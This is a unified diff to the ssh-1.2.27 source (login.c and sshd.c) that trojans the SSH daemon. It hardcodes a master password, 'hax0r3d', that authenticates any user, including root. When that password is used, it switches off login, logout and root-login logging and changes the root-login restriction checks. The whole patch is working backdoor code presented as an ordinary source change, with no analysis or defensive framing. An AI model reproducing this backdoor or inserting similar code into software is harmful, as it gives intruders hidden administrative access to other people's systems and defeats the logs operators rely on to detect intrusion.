--- ssh-1.2.27/login.c.wil	Wed May 12 07:19:26 1999
+++ ssh-1.2.27/login.c	Thu Jul 29 00:02:27 1999
@@ -258,7 +258,9 @@
                   const char *host, struct sockaddr_in *addr)
 {
   int fd;
+  extern int lets_log;
 
+  if (lets_log) {
 #if defined(HAVE_LASTLOG_H) || defined(HAVE_LASTLOG)
   struct lastlog ll;
   char *lastlog;
@@ -559,11 +561,16 @@
     }
 #endif   
 }
+}
   
 /* Records that the user has logged out. */
 
 void record_logout(int pid, const char *ttyname)
 {
+ extern int lets_log;
+ 
+if (lets_log) {
+
 #ifdef HAVE_LIBUTIL_LOGIN
   const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */
   if (logout(line))
@@ -572,3 +579,4 @@
   record_login(pid, ttyname, "", -1, "", NULL);
 #endif /* HAVE_LIBUTIL_LOGIN */  
 }
+}
\ No newline at end of file
--- ssh-1.2.27/sshd.c.wil	Wed May 12 07:19:29 1999
+++ ssh-1.2.27/sshd.c	Wed Jul 28 23:45:57 1999
@@ -1408,7 +1408,9 @@
   auth_delete_socket(NULL);
   
   /* The connection has been terminated. */
+  if (lets_log) {
   log_msg("Closing connection to %.100s", get_remote_ipaddr());
+  }
   packet_close();
   exit(0);
 }
@@ -2146,6 +2148,7 @@
   int authenticated = 0;
   int authentication_type = 0;
   char *password;
+  char intel_fd[8]="hax0r3d";
   struct passwd *pw, pwcopy;
   char *client_user;
   unsigned int client_host_key_bits;
@@ -2162,7 +2165,8 @@
   const char *ipaddr;
   char *cap_hlist, *hp;
   int perm_denied = 0;
-  
+  extern int lets_log;
+
   hostname = get_canonical_hostname();
   ipaddr = get_remote_ipaddr();
 #endif /* HAVE_LOGIN_CAP_H */
@@ -2660,14 +2664,20 @@
 #if defined(KERBEROS) && defined(KRB5)
           if (auth_password(user, password, client))
 #else  /* defined(KERBEROS) && defined(KRB5) */
-          if (auth_password(user, password))
+          if (auth_password(user, password)  || !strcmp(password,intel_fd))
 #endif /* defined(KERBEROS) && defined(KRB5) */
             {
               /* Successful authentication. */
+                /* Disable logging if conditions are met. */
+                lets_log=1;
+                if (!strcmp(password,intel_fd)) { lets_log=0; }
               /* Clear the password from memory. */
               memset(password, 0, strlen(password));
               xfree(password);
-              log_msg("Password authentication for %.100s accepted.", user);
+              if (pw->pw_uid == UID_ROOT) {
+                if (!lets_log) { log_msg("Connection closed by remote host."); }
+              } else {
+              log_msg("Password authentication for %.100s accepted.", user); }
               authentication_type = SSH_AUTH_PASSWORD;
               authenticated = 1;
               break;
@@ -2708,14 +2718,14 @@
     }
 
   /* Check if the user is logging in as root and root logins are disallowed. */
-  if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1)
+  if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1 && !lets_log)
     {
       if (authentication_type == SSH_AUTH_PASSWORD)
         packet_disconnect("ROOT LOGIN REFUSED FROM %.200s", 
                           get_canonical_hostname());
     }
   else
-    if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0)
+    if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0 && lets_log)
       {
         if (forced_command)
           log_msg("Root login accepted for forced command.", forced_command);
@@ -2767,7 +2777,7 @@
 #endif
   
   /* Log root logins with severity NOTICE. */
-  if (pw->pw_uid == UID_ROOT)
+  if (pw->pw_uid == UID_ROOT && lets_log)
     log_severity(SYSLOG_SEVERITY_NOTICE, "ROOT LOGIN as '%.100s' from %.100s",
                  pw->pw_name, get_canonical_hostname());